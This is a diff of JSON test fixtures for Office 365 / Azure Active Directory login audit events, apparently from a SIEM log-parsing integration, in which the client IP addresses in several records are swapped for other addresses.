+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"0b158f74-e223-43c8-9cfd-5f4442f29fc7\",\"InterSystemsId\":\"5cd6215d-e206-4c3f-805d-6e386cbdab7a\",\"IntraSystemId\":\"9c218a27-ed51-4011-8383-e76850e85000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -1653,10 +1653,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:13:01",
 "ExtendedProperties": [
 {
@@ -1706,7 +1706,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"00000003-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4819a0c2-2050-4549-ab66-f5b90cbbcc5a\",\"InterSystemsId\":\"612b339f-1088-a000-f25f-9c8af4d57894\",\"IntraSystemId\":\"c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000003-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4819a0c2-2050-4549-ab66-f5b90cbbcc5a\",\"InterSystemsId\":\"612b339f-1088-a000-f25f-9c8af4d57894\",\"IntraSystemId\":\"c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -1724,10 +1724,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "213.97.47.133",
+ "ActorIpAddress": "67.43.156.15",
 "ApplicationId": "00000003-0000-0ff1-ce00-000000000000",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "213.97.47.133",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-07T16:43:51",
 "ExtendedProperties": [
 {
@@ -1777,7 +1777,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:29\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e94002d9-f6e8-46f9-8702-2a29e908e73d\",\"InterSystemsId\":\"61eb5713-2687-4c00-a7b2-fde4788c395b\",\"IntraSystemId\":\"3db9a461-6dd1-4950-b3e3-fbe8c2d5c700\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:29\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e94002d9-f6e8-46f9-8702-2a29e908e73d\",\"InterSystemsId\":\"61eb5713-2687-4c00-a7b2-fde4788c395b\",\"IntraSystemId\":\"3db9a461-6dd1-4950-b3e3-fbe8c2d5c700\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -1795,10 +1795,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "79.159.10.151",
+ "ClientIP": "67.43.156.13",
 "CreationTime": "2020-02-12T21:38:29",
 "ExtendedProperties": [
 {
@@ -1848,7 +1848,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"1ca4f684-3a34-44a8-99b8-064d1071768a\",\"InterSystemsId\":\"61f81224-65fd-4c1b-b388-ee0e25485191\",\"IntraSystemId\":\"dc0cc415-9a00-470d-bda3-867e11fdd400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"1ca4f684-3a34-44a8-99b8-064d1071768a\",\"InterSystemsId\":\"61f81224-65fd-4c1b-b388-ee0e25485191\",\"IntraSystemId\":\"dc0cc415-9a00-470d-bda3-867e11fdd400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -1866,10 +1866,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "79.159.10.151",
+ "ClientIP": "67.43.156.13",
 "CreationTime": "2020-02-12T21:38:37",
 "ExtendedProperties": [
 {
@@ -1919,7 +1919,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2\",\"InterSystemsId\":\"661f2330-3e04-483d-9781-caaa4543cc13\",\"IntraSystemId\":\"01c15486-46e2-487a-91f5-11445da0b600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2\",\"InterSystemsId\":\"661f2330-3e04-483d-9781-caaa4543cc13\",\"IntraSystemId\":\"01c15486-46e2-487a-91f5-11445da0b600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1937,10 +1937,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:51:50", "ExtendedProperties": [ { 
@@ -1990,7 +1990,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:42\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b290b902-b6f2-49f6-b7f8-ea1541d85c8c\",\"InterSystemsId\":\"68d7eaa4-aa57-4508-9792-09e80c911aa1\",\"IntraSystemId\":\"1590b91f-bffe-4cd8-9028-de52692f5400\",\"ModifiedProperties\":[],\"ObjectId\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:42\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b290b902-b6f2-49f6-b7f8-ea1541d85c8c\",\"InterSystemsId\":\"68d7eaa4-aa57-4508-9792-09e80c911aa1\",\"IntraSystemId\":\"1590b91f-bffe-4cd8-9028-de52692f5400\",\"ModifiedProperties\":[],\"ObjectId\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2008,10 +2008,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:42", "ExtendedProperties": [ { 
@@ -2061,7 +2061,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:42:59\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"b0c1c4a7-c6db-4f14-b628-54e37a7a6785\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"f54da4fe-0a54-45f3-b6ea-39f873eb6000\",\"LogonError\":\"FlowTokenExpired\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:42:59\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"b0c1c4a7-c6db-4f14-b628-54e37a7a6785\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"f54da4fe-0a54-45f3-b6ea-39f873eb6000\",\"LogonError\":\"FlowTokenExpired\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2079,10 +2079,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:42:59", "ExtendedProperties": [ { 
